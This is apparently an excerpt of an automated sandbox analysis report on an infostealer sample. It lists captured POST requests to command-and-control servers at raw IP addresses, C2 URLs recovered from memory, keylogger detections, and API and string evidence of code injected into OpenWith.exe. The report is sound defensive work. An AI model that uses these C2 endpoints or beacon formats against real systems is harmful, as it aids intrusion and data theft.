Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODYzOTY=Host: 91.202.233.180Content-Length: 86548Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODYzOTY=Host: 91.202.233.180Content-Length: 86548Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic HTTP traffic detected: POST /g88sks2SaM/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODYzOTY=Host: 91.202.233.180Content-Length: 86548Cache-Control: no-cache
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: NETERRA-ASBG NETERRA-ASBG
Source: Joe Sandbox View ASN Name: M247GB M247GB
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Source: unknown DNS traffic detected: query: hnlhrsLvnXQMkLSbq.hnlhrsLvnXQMkLSbq replaycode: Name error (3)
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: unknown TCP traffic detected without corresponding DNS query: 91.202.233.180
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B63B21BC WSARecv, 20_3_00007DF4B63B21BC
Source: unknown DNS traffic detected: queries for: hnlhrsLvnXQMkLSbq.hnlhrsLvnXQMkLSbq
Source: unknown HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D9D000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 00000017.00000002.2949713341.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 00000017.00000002.2950687213.00000000031B5000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 00000017.00000002.2949713341.0000000000D77000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 00000017.00000003.2567419623.0000000000D9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.php
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.php/
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D67000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.php3G
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.php?scr=1
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.php?scr=17e
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.php?scr=19
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.php?scr=19Gf
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.php?scr=19IfYj
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.php?scr=19aeqk
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.php?scr=19mfuj
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.php?scr=1=1
Source: Dctooux.exe, 00000017.00000002.2950449104.0000000002A5E000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.php?scr=1D
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.php?scr=1on
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D67000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.phpOF
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.phpT
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.phpc
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.phpded
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D67000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.phpic
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.phpoded
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D77000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.phpodedJdUk
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D9D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.phps
Source: Dctooux.exe, 00000017.00000002.2949713341.0000000000D67000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.202.233.180/g88sks2SaM/index.phpsF
Source: Publication.0.dr String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: Publication.0.dr String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Publication.0.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Publication.0.dr String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: J2NWKU2oJi.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Publication.0.dr String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Publication.0.dr String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: Publication.0.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Publication.0.dr String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Publication.0.dr String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: Pleasure.pif, 0000000A.00000000.1724862263.0000000000219000.00000002.00000001.01000000.00000006.sdmp, Publication.0.dr, Pleasure.pif.1.dr String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: dialer.exe, 00000010.00000002.2280099668.00000000027AC000.00000004.00000010.00020000.00000000.sdmp, dialer.exe, 00000010.00000002.2280467763.0000000002E98000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, OpenWith.exe, 00000014.00000003.2380401073.000001BD77781000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2388372359.000001BD77781000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2383846923.000001BD77781000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2382259358.000001BD77781000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2379080486.000001BD77781000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2381455788.000001BD77781000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2330137003.000001BD77781000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2377146496.000001BD77781000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2380016439.000001BD77781000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000002.2584550230.000001BD7778C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2376868468.000001BD77781000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2378806137.000001BD77781000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2518893814.000001BD77785000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2580212347.000001BD7778B000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2388588718.000001BD77786000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000002.2583114275.000001BD75700000.00000040.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2378242743.000001BD77781000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2386577450.000001BD77781000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://94.156.10.37:2036/efc85e6acdfc3a785/1evgkhav.3ltvh
Source: dialer.exe, 00000010.00000002.2280099668.00000000027AC000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://94.156.10.37:2036/efc85e6acdfc3a785/1evgkhav.3ltvhD
Source: dialer.exe, 00000010.00000002.2280467763.0000000002E98000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000002.2583114275.000001BD75700000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: https://94.156.10.37:2036/efc85e6acdfc3a785/1evgkhav.3ltvhkernelbasentdllkernel32GetProcessMitigatio
Source: OpenWith.exe, 00000014.00000003.2377428787.000001BD77963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: OpenWith.exe, 00000014.00000003.2377428787.000001BD77963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: OpenWith.exe, 00000014.00000003.2377428787.000001BD77963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: OpenWith.exe, 00000014.00000003.2377428787.000001BD77963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: OpenWith.exe, 00000014.00000003.2387709304.000001BD77943000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://discord.com
Source: OpenWith.exe, 00000014.00000003.2387709304.000001BD77943000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://discordapp.com
Source: OpenWith.exe, 00000014.00000003.2377428787.000001BD77963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: OpenWith.exe, 00000014.00000003.2377428787.000001BD77963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: OpenWith.exe, 00000014.00000003.2377428787.000001BD77963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: OpenWith.exe, 00000014.00000002.2583993168.000001BD776C7000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2580503855.000001BD776C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: OpenWith.exe, 00000014.00000003.2388299627.000001BD776F8000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2388098872.000001BD776F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mic
Source: OpenWith.exe, 00000014.00000003.2379186659.000001BD776D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office
Source: OpenWith.exe, 00000014.00000003.2436109596.000001BD77774000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-21
Source: OpenWith.exe, 00000014.00000003.2378806137.000001BD776C4000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2381455788.000001BD776D5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2378601917.000001BD77A00000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2379297840.000001BD77999000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2412338349.000001BD77770000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2386577450.000001BD776F5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2383846923.000001BD776F5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2436178442.000001BD776AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: OpenWith.exe, 00000014.00000003.2378645142.000001BD77974000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: OpenWith.exe, 00000014.00000003.2381455788.000001BD776D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016y
Source: OpenWith.exe, 00000014.00000003.2381455788.000001BD776D5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2378601917.000001BD77A00000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2379297840.000001BD77999000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2412338349.000001BD77770000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2386577450.000001BD776F5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2378806137.000001BD776F5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2383846923.000001BD776F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: OpenWith.exe, 00000014.00000003.2380609962.000001BD776DA000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2382259358.000001BD776DA000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2380401073.000001BD776D4000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2384215921.000001BD776E0000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2381455788.000001BD776D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e171
Source: OpenWith.exe, 00000014.00000003.2378645142.000001BD77974000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: OpenWith.exe, 00000014.00000002.2583923900.000001BD776AA000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2387896301.000001BD776A4000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2412273638.000001BD776A8000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2382101034.000001BD776A2000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2436178442.000001BD776AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17N-SiX4Yyn3iFo5fv-Rsj0cGE-FFrP
Source: OpenWith.exe, 00000014.00000003.2379186659.000001BD776F5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2378806137.000001BD776F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17t.mc_id=EnterPK201694ba2e0b-6
Source: Publication.0.dr String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: OpenWith.exe, 00000014.00000003.2377428787.000001BD77963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: Publication.0.dr String found in binary or memory: https://www.globalsign.com/repository/0
Source: Publication.0.dr String found in binary or memory: https://www.globalsign.com/repository/06
Source: OpenWith.exe, 00000014.00000003.2377428787.000001BD77963000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe Code function: 0_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_004056DE
Creates a DirectInput object (often for capturing keystrokes)
Source: dialer.exe, 00000010.00000003.2204938380.0000000005080000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: DirectInput8Create memstr_b762d6a8-3
Installs a raw input device (often for capturing keystrokes)
Source: dialer.exe, 00000010.00000003.2204938380.0000000005080000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: GetRawInputData memstr_f8d2a4a0-4
Yara detected Keylogger Generic
Source: Yara match File source: 16.3.dialer.exe.5080000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.3.dialer.exe.4e60000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.3.dialer.exe.5080000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.3.dialer.exe.4e60000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.3.dialer.exe.4e60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000010.00000003.2204938380.0000000005080000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.2204492653.0000000004E60000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: dialer.exe PID: 796, type: MEMORYSTR
Contains functionality to call native functions
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_000001BD758630C7 RtlAllocateHeap,NtAcceptConnectPort,NtAcceptConnectPort,NtAcceptConnectPort,RtlDeleteBoundaryDescriptor,RtlDeleteBoundaryDescriptor, 20_3_000001BD758630C7
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B638A600 NtAcceptConnectPort, 20_3_00007DF4B638A600
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B638A540 NtAcceptConnectPort, 20_3_00007DF4B638A540
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B638A2B0 NtAcceptConnectPort, 20_3_00007DF4B638A2B0
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B638B088 NtAcceptConnectPort,NtAcceptConnectPort, 20_3_00007DF4B638B088
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B638B154 NtAcceptConnectPort,NtAcceptConnectPort, 20_3_00007DF4B638B154
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B6388D94 NtAcceptConnectPort, 20_3_00007DF4B6388D94
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B6389F40 NtAcceptConnectPort, 20_3_00007DF4B6389F40
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B6388C08 NtAcceptConnectPort, 20_3_00007DF4B6388C08
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B6388C90 NtAcceptConnectPort, 20_3_00007DF4B6388C90
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B6389CA0 _calloc_dbg,NtAcceptConnectPort, 20_3_00007DF4B6389CA0
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B6388A40 NtAcceptConnectPort, 20_3_00007DF4B6388A40
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B6389AF4 _malloc_dbg,NtAcceptConnectPort,NtAcceptConnectPort,??3@YAXPEAX@Z, 20_3_00007DF4B6389AF4
Source: C:\Windows\System32\OpenWith.exe Code function: 20_3_00007DF4B6388AFC NtAcceptConnectPort, 20_3_00007DF4B6388AFC
Source: C:\Windows\System32\OpenWith.exe Code function: 20_2_000001BD75701A90 NtAcceptConnectPort,NtAcceptConnectPort,RtlAddVectoredExceptionHandler, 20_2_000001BD75701A90
Source: C:\Windows\System32\OpenWith.exe Code function: 20_2_000001BD75700AC8 NtAcceptConnectPort,NtAcceptConnectPort, 20_2_000001BD75700AC8
Source: C:\Windows\System32\OpenWith.exe Code function: 20_2_000001BD757015AC NtAcceptConnectPort, 20_2_000001BD757015AC
